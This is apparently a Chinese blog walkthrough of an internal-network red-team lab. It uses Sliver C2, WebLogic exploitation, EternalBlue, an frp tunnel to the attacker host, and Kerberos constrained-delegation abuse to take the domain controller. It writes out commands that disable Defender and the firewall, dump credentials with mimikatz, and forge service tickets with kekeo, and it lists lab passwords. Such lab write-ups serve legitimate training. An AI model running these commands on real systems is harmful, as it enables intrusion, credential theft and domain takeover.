Sliver C2通关渗透攻击红队内网域靶场2.0
准备
2012 server
第一台机器开机后,要在C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain
手动运行下 startWebLogic.cmd
,但是我访问7001遇到了报错:
是路径配置错误,但是没搜到什么解决方法,全踏马互相抄互相抄。去问chatgpt,给出的解释是去访问http://127.0.0.1:7001/console
访问这个页面会开始部署,页面不停的刷新。
之后就可以成功的进入页面。
网卡也要配置,在控制面版中将网卡改成自动获取IP,他默认是10.10.0.12
windows 7 PC
也是一样的配置网卡,选择随机。需要输入认证:
先输入域账户:redteam\saul:admin!@#45
再输入域管的账户:Administrator:Admin12345
最后的配置:
win 2008 sql server
认证需要先输入域账户:redteam\sqlserver:Server12345
再输入本地管理员:Administrator:Admin12345
最后的配置:
除此之外要看看是否开启了sql server,在服务中查看有没有开启,且当前用户无权开启。
然后以管理员身份开cmd也启动不了。
sql server管理配置器中启动也不行
查看Windows日志,很多报错,看样子是时间调整了导致超过了180天不能使用了
此处版本不用更改,然后去搜密钥,这个老哥的可以用:传送门
之后就是下一步下一步然后确定即可,等待升级完成。此时再通过命令行启动就没有问题了。
net start MSSQLSERVER
域控
如下:
网络拓扑
名称 | ip1 | ip2 |
---|---|---|
ubuntu | 192.168.130.14 | / |
win 2012 外网服务器 | 192.168.130.4 | 10.0.10.4 |
win 7 个人PC | 10.0.10.5 | 10.0.20.5 |
邮件服务器 | 10.0.20.4 | / |
域控 | 10.0.20.6 | / |
外网打点
拿到目标IP192.168.130.4
,Ubuntu启动,nmap启动,扫描之后看到开放的端口如下:
依次访问各个端口:
weblogic一把梭
上工具检测weblogic有没有历史漏洞,得到CVE-2016-0638有回显可以利用。
注入内存马
直接注入内存马用哥斯拉连接上去。
用哥斯拉自带的模块抓一下密码,但由于是win2012,系统会开启LSA保护,明文密码字段会显示null。不过这里可以看到是工作组环境。
派生至sliver上线
新建生成beacon的配置文件,使用配置文件来生成马子,通过哥斯拉上传执行来上线sliver。
信息收集
新建一个session会话,收集到存在第二个网段。
永恒之蓝横向
使用命令socks5 start
开启代理,修改/etc/proxychains.conf
,挂上代理扫这个c段,过滤物理机和当前机器。发现存在另外一个10.0.10.5且存在永恒之蓝。
看到开启了445端口,尝试用命名管道进行中转,生成对应的shellcode。
挂代理使用脚本去打,这个试了几次都超时了。
有点效果,给打蓝屏了,但是得不到shell。
使用go写的脚本也不行,对shellcode的大小有限制,即使是打个计算器都要等很久还失败了。
无奈使用msf,开启并挂上代理,指定正向马来开session。但是给sliver的session给整断掉了。
setg Proxies socks5:127.0.0.1:7878
setg ReverseSAllowProxy true
服务端配置如下:
[common]
bind_addr =192.168.130.14
bind_port = 7000
客户端配置如下,传到win 2012上执行。
[common]
server_addr = 192.168.130.14
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5
再次挂上新的代理setg Proxies socks5:127.0.0.1:7777
拿下了shell。
内网渗透
tcp中转马
但是传了几个马子上去都回连不上,尝试关闭defender和防火墙。sliver还是不够稳定,直接用shell就进不去会卡住,也不监听ctrl c来给用户取消,一退出去session就没了。使用execute就是对中文不友好会乱码。关闭之后就陆续有前面的马子回连了。
execute -o cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
execute -o cmd /c netsh advfirewall show all state
execute -o cmd /c netsh advfirewall set allprofile state off
这里我删除之后尝试重新执行上传的马子,发现命名管道中转的都没有成功,最后只有使用tcp的可以上线:
内网信息收集
在本机继续收集信息,当前权限最高,可以抓一手密码。
获取凭据
msf中内置了mimikatz就不用再从sliver中传上去操作,抓到了密码Saul:admin!@#45
。
出了点问题滚了快照,msf没配置成,临时配了个viper再打一次。查看域信息,发现存在域:
// 查看域用户
net user /domain
// 查看域控
net group "domain controllers" /domain
// 查看域管理员
net group "domain admins" /domain
sliver中还是一开shell就会卡死,但是可以用插件来收集:
查看进程,没有域管进程,无法窃取令牌。
横向移动
sliver方便的就是挂代理很方便,可以直接挂起开fscan来扫,这看到除了本机,物理机外还有两台机器,4为sql server,6就是域控了,同时扫出来sql server有弱口令sa;sa
。
要想办法拿下域控,这里看到域控有web服务,但无法利用。
SQL server上则是一个2s。
用mimikatz只抓到了win7上sual的凭据没法接着利用,但可以用来查询域内被配置了委派的用户。看了一下shell那块的源码,可能是没有获取到cmd或者powershell的路径而卡住了:
尝试自己指定path,确实可以开启交互式shell了,但是传AdFind上去执行又卡了(其他命令还是正常的):
shell -s c:\\windows\\system32\\cmd.exe
execute执行成功后可以看到可以看到sqlserver被设置了约束委派:
execute -o AdFind.exe -h 10.0.20.6 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
弱口令接管SQL SERVER
那要想办法拿下这台SQL server,利用前面的弱口令来连接数据库。
生成中转马,通过工具上传上去。执行后上线。
EsfpPotato提权
sliver中自带的提权模块失败了,点击on plus
加载工具中的esfPotato之后再次执行马子上线。
sliver的armory中没有mimikatz模块,为了方便使用,在/home/$user/.sliver-client/aliases
下创建文件夹mimikatz,添加配置文件以及64和32位的mimikatz.exe,之后aliases load /home/\$user/.sliver-client/aliases/mimikatz
。
{
"name": "Mimikatz",
"version": "2.2.0",
"command_name": "mimikatz",
"original_author": "gentilkiwi",
"repo_url": "https://github.com/gentilkiwi/mimikatz",
"help": "mimikatz is a tool I've made to learn C and make somes experiments with Windows security.",
"entrypoint": "Main",
"allow_args": true,
"default_args": "",
"is_reflective": false,
"is_assembly": true,
"files": [
{
"os": "windows",
"arch": "amd64",
"path": "mimikatz.exe"
},
{
"os": "windows",
"arch": "386",
"path": "mimikatz386.exe"
}
]
}
抓到密码Server12345
:
mimikatz "privilege::debug" "serkurlsa::logonpasswords" "exit"
约束委派接管域控
拿到了密码,使用rubues老报错,故尝试使用kekeo 请求TGT,会在当前目录下产生一个TGT:TGT_sqlserver@READTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirib
k.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:sqlserver.kirbiex"
使用申请的TGT伪造administrator的服务票据
k.exe "tgs::s4u /tgt:TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red"
导入票据之前无法访问域控:
使用mimikatz导入伪造的票据,之后可以访问到域控。
kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi
Sliver C2通关渗透攻击红队内网域靶场2.0的更多相关文章
- 【APT】NodeJS 应用仓库钓鱼,大规模入侵开发人员电脑,批量渗透各大公司内网
APT][社工]NodeJS 应用仓库钓鱼,大规模入侵开发人员电脑,批量渗透各大公司内网 前言 城堡总是从内部攻破的.再强大的系统,也得通过人来控制.如果将入侵直接从人这个环节发起,那么再坚固的防线, ...
- 对国外某hotel的内网域简单渗透
Penetration Testing不单单是一个博客,更热衷于技术分享的平台. 本文将讲述对国外某一hotel的渗透测试,让更多的人安全意识得到提高,有攻才有防,防得在好,也有疏忽的地方,这就是为啥 ...
- 得到内网域管理员的5种常见方法<转>
1.Netbios and LLMNR Name Poisoning 这个方法在WIN工作组下渗透很有用,WIN的请求查询顺序是下面三个步骤:本地hosts文件(%windir%\System32\d ...
- 内网域渗透之MS14-068复现
在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限.如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务 ...
- 内网域渗透之MS14-068复现(CVE-2014-6324)
在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限.如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务 ...
- HW弹药库之红队作战手册
红方人员实战手册 声明 Author : By klion Date : 2020.2.15 寄语 : 愿 2020 后面的每一天都能一切安好 分享初衷 一来, 旨在为 "攻击" ...
- 3.内网渗透之reGeorg+Proxifier
aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAxIAAAE2CAIAAAB6BDOVAAAgAElEQVR4Aey9Z5Aex3X327MRGVzkRH ...
- beef + msf 实现内网渗透
在内网渗透方面,最为大众所知道的就是xp系统的ms08067漏洞,通过这个漏洞可以对未打上补丁的xp系统实现getshell, 但是经过笔者发现,这种漏洞攻击在被攻击机开上windows防火墙的时候是 ...
- vulstack红队评估(四)
一.环境搭建: ①根据作者公开的靶机信息整理 虚拟机密码: ubuntu: ubuntu:ubuntu win7: douser:Dotest123 Win2008 DC: administr ...
- 【渗透实战】记一次艰难的内网漫游第四期_蹭我WIFI?看我如何利用组合拳日进蹭网者内网
/文章作者:Kali_MG1937 CSDN博客ID:ALDYS4 QQ:3496925334/ 内网漫游系列第三期:[渗透实战]记一次艰难的内网漫游第三期_我是如何利用APT攻击拿到内网最高权限的 ...
随机推荐
- SqlSugar分表
一.使用场景 (1)可扩展架构设计,比如一个ERP用5年不卡,到了10就卡了因为数据太多了,这个时候很多人都是备份然后清空数据 (2) 数据量太多 ,例如每天都有 几十上百万的数据进入库,如果不分表后 ...
- 数据挖掘[一]---汽车车交易价格预测(测评指标;EDA)
题目出自阿里天池赛题链接:零基础入门数据挖掘 - 二手车交易价格预测-天池大赛-阿里云天池 相关文章: 特征工程详解及实战项目[参考] 数据挖掘---汽车车交易价格预测[一](测评指标:EDA) 数据 ...
- conditional_t和enable_if_t的实现
conditional_t和enable_if_t是元编程里面很相似却有有着一定区别的模板.形如conditional_t<_Cond, _If, _Else>是指如果_Cond表达式 ...
- Docker从认识到实践再到底层原理(二-3)|LXC容器
前言 那么这里博主先安利一些干货满满的专栏了! 首先是博主的高质量博客的汇总,这个专栏里面的博客,都是博主最最用心写的一部分,干货满满,希望对大家有帮助. 高质量博客汇总 然后就是博主最近最花时间的一 ...
- PHP 会话(Session)实现用户登陆功能
PHP 会话(Session)实现用户登陆功能 Session 的工作机制是:为每个访客创建一个唯一的 id (UID),并基于这个 UID 来存储变量.UID 存储在 cookie 中,或者通过 U ...
- CF940F Machine Learning题解
题目链接:洛谷 或者 CF 不是特别难的题,抽象下题意就是算区间次数出现的次数 mex 和带单点修改.看到范围 \(1e5\) 还带修改,传统的 mex 求法里貌似就莫队类算法好带修,考虑带修莫队. ...
- Softmax偏导及BP过程的推导
Softmax求导 其实BP过程在pytorch中可以自动进行,这里进行推导只是强迫症 A Apart证明softmax求导和softmax的BP过程 本来像手打公式的,想想还是算了,引用部分给出la ...
- linux-Shell将命令行终端输出结果写入保存到文件中
(一)将输出与错误写到同一个文件(1)方法1 #!bin/bashjava -jar hbase-example.jar 2>&1 | tee hbase_log.txt 说明:0,1, ...
- 浅谈一下对于 js 中的 this 的理解
浅谈一下对于 js 中的 this 的理解 对于 this 值的定义: 简单来说 this 是一个对象,这个对象具体的值是什么,取决于运行时的环境,即代码执行时的环境. MDN: 当前执行上下文( g ...
- NOI 2019 补全记录
D1T1 回家路线 好久之前写的,忘了具体细节,但是发现有平方项所以考虑拆项之后斜率优化. D1T2 机器人 考虑 DP. 记 \(f_{l,r,i}\) 表示 \([l,r]\) 这段区间,最大值为 ...